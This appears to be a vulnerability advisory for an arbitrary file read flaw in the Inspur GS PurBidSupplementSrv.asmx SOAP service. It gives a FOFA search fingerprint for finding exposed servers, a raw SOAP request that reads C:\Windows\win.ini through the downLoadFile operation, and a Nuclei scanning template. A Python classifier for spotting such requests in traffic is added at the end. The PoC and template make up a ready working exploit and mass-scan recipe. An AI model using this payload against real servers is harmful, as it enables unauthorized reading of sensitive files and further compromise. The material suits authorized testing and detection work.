Disclaimer
Do not use the techniques in this article for illegal testing. Any direct or indirect consequences or losses caused by disseminating or using the information or tools provided here are the sole responsibility of the user; the author is not liable for any resulting harm. This article is for learning purposes only.
Vulnerability description:
The Inspur GS PurBidSupplementSrv.asmx web service has an arbitrary file read vulnerability. By sending a specially crafted SOAP request, an attacker can read arbitrary files on the server, which may lead to disclosure of sensitive information and further compromise of the system.
Affected versions:
Inspur GS
FOFA:
"cwbase/web/scripts/aes.js"
PoC:
POST /cwbase/service/cepp/PurBidSupplementSrv.asmx HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: GSPWebLanguageKey=zh-CN
Upgrade-Insecure-Requests: 1

<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body xmlns:m="http://tempuri.org/">
<m:downLoadFile>
<m:filePath>C:\\Windows\\win.ini</m:filePath>
<m:offset>0</m:offset>
</m:downLoadFile>
</soap:Body>
</soap:Envelope>
Check whether the response body contains the contents of the Windows win.ini file.
Nuclei template:
id: inspur-gs-purbidsupplementsrv-file-read

info:
  name: Inspur GS PurBidSupplementSrv Arbitrary File Read
  author: ProjectDiscoveryAI
  severity: high
  description: |
    This template checks for an arbitrary file read vulnerability in Inspur GS PurBidSupplementSrv.
    It sends a SOAP request to read the 'C:\\Windows\\win.ini' file.
  tags: inspur, file-read, soap, xml

http:
  - raw:
      - |
        POST /cwbase/service/cepp/PurBidSupplementSrv.asmx HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate, br
        Cookie: GSPWebLanguageKey=zh-CN
        Upgrade-Insecure-Requests: 1

        <?xml version="1.0"?>
        <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
        <soap:Body xmlns:m="http://tempuri.org/">
        <m:downLoadFile>
        <m:filePath>C:\\Windows\\win.ini</m:filePath>
        <m:offset>0</m:offset>
        </m:downLoadFile>
        </soap:Body>
        </soap:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "[extensions]"
          - "[mci extensions]"

      - type: word
        part: header
        words:
          - "text/xml"
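For the detection side, here is an added example that is not part of the original post or the vendor's code: a small Python classifier that takes one captured request (method, path, body) as a WAF or reverse-proxy log hook would see it, parses the SOAP envelope, and flags downLoadFile calls whose filePath is absolute, UNC or contains a `..` segment. The request template is constructed from the PoC shape above, not captured traffic, and the helper names are assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Endpoint, namespaces and operation exactly as they appear in the advisory's PoC.
TARGET_PATH = "/cwbase/service/cepp/PurBidSupplementSrv.asmx"
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
OP_NS = "http://tempuri.org/"

# Constructed sample body in the shape of the published PoC (not captured traffic);
# the literal FILEPATH token is replaced with the value under test.
BODY_TEMPLATE = (
    '<?xml version="1.0"?>\n'
    f'<soap:Envelope xmlns:soap="{SOAP_NS}">\n<soap:Body xmlns:m="{OP_NS}">\n'
    "<m:downLoadFile>\n<m:filePath>FILEPATH</m:filePath>\n<m:offset>0</m:offset>\n"
    "</m:downLoadFile>\n</soap:Body>\n</soap:Envelope>"
)

def build_body(file_path: str) -> str:
    return BODY_TEMPLATE.replace("FILEPATH", file_path)

def extract_file_path(body: str):
    """filePath of a downLoadFile call; '' if the element is empty, None if absent or
    unparseable. ElementTree does not resolve external entities, so hostile input is fine."""
    try:
        root = ET.fromstring(body.lstrip())
    except ET.ParseError:
        return None
    fp = root.find(f".//{{{SOAP_NS}}}Body/{{{OP_NS}}}downLoadFile/{{{OP_NS}}}filePath")
    return None if fp is None else (fp.text or "").strip()

def is_suspicious_path(path: str) -> bool:
    """True for drive-letter, rooted or UNC paths and for any '..' segment.
    The PoC doubles its backslashes, so collapse those before matching."""
    p = path.replace("\\\\", "\\")
    if re.match(r"^[A-Za-z]:[\\/]", p) or p.startswith(("\\", "/")):
        return True
    return any(seg == ".." for seg in re.split(r"[\\/]", p))

def inspect_request(method: str, path: str, body: str):
    """(True, reason) for a POST to the vulnerable endpoint whose downLoadFile filePath
    points outside an application-relative location; (False, None) otherwise."""
    if method.upper() != "POST" or path.split("?", 1)[0] != TARGET_PATH:
        return (False, None)
    fp = extract_file_path(body)
    if fp is None or not is_suspicious_path(fp):
        return (False, None)
    return (True, f"downLoadFile filePath escapes web root: {fp}")
```

Matching on the request rather than on win.ini markers in the response catches reads of any file, which the nuclei matcher above does not.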